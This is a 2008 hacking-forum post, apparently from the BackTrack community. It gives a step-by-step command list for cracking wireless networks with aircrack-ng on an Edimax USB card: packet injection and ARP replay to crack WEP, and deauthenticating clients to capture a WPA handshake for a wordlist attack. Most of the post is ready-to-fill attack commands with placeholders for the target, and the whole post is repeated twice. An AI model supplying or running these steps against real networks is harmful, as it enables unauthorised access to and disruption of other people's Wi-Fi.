0tt0v0nc4t
07-03-2008, 03:21 PM
Hello,
I have another thread Discussing some problems we have been experiencing with the Edimax 7318USg (http://forums.remote-exploit.org/showthread.php?t=14720) . Some people are having a hard time getting the card to inject with command line and since this isnt a problem I have had, I thought I would document what works for me here.
There are three things I want to make very clear before I begin.
First- This is just a compressed version of one of Xploits tutorials. I watched his video's like everyone else and made a txt file with the commands that were used because my memory is terrible. If there are any thanx to be had please remember Xploits as well.
Second- I am still very new to Linux and cannot offer much troubleshooting. If this doesn't work for you, I will most likely not know why. This is just what works for me, I'm still learning just like most of you. ;)
3rd - Any commands inside of the <> symbols are variables. In other words its up to you to configure the information as needed. I have color coded the commands below as a reference in an attempt to avoid confusion .
Mac address of the of the AP
Mac address of your card
Channel of the AP
Name it anything you want
Configure card
modprobe -r rt73 (unload driver)
modprobe rt73 (load driver)
ifconfig rausb0 up (interface up)
iwconfig rausb0 rate 1M (Lower card rate to 1MB)Wep
airodump-ng rausb0 (Scans SSID's)
airodump-ng -c <channel> -w <output> --bssid <mac> rausb0 (target SSID)
aireplay-ng -1 0 -a <mac> -h <yourmac> rausb0 (authenticate)
aireplay-ng -3 -b <mac> -h <yourmac> rausb0 (inject IV's)
aircrack-ng -n 128 <output>*.cap (crack wep)WPA
airodump-ng rausb0 (Scans SSID's)
airodump-ng -c <channel> -w <output> --bssid <mac> rausb0 (target SSID)
aireplay-ng -0 1 -a <mac> -c <yourmac> rausb0 (De Auth)
aircrack-ng -w password.lst <output>*.capHope this helps, good luck.
I have another thread Discussing some problems we have been experiencing with the Edimax 7318USg (http://forums.remote-exploit.org/showthread.php?t=14720) . Some people are having a hard time getting the card to inject with command line and since this isnt a problem I have had, I thought I would document what works for me here.
There are three things I want to make very clear before I begin.
First- This is just a compressed version of one of Xploits tutorials. I watched his video's like everyone else and made a txt file with the commands that were used because my memory is terrible. If there are any thanx to be had please remember Xploits as well.
Second- I am still very new to Linux and cannot offer much troubleshooting. If this doesn't work for you, I will most likely not know why. This is just what works for me, I'm still learning just like most of you. ;)
3rd - Any commands inside of the <> symbols are variables. In other words its up to you to configure the information as needed. I have color coded the commands below as a reference in an attempt to avoid confusion .
Mac address of the of the AP
Mac address of your card
Channel of the AP
Name it anything you want
Configure card
modprobe -r rt73 (unload driver)
modprobe rt73 (load driver)
ifconfig rausb0 up (interface up)
iwconfig rausb0 rate 1M (Lower card rate to 1MB)Wep
airodump-ng rausb0 (Scans SSID's)
airodump-ng -c <channel> -w <output> --bssid <mac> rausb0 (target SSID)
aireplay-ng -1 0 -a <mac> -h <yourmac> rausb0 (authenticate)
aireplay-ng -3 -b <mac> -h <yourmac> rausb0 (inject IV's)
aircrack-ng -n 128 <output>*.cap (crack wep)WPA
airodump-ng rausb0 (Scans SSID's)
airodump-ng -c <channel> -w <output> --bssid <mac> rausb0 (target SSID)
aireplay-ng -0 1 -a <mac> -c <yourmac> rausb0 (De Auth)
aircrack-ng -w password.lst <output>*.capHope this helps, good luck.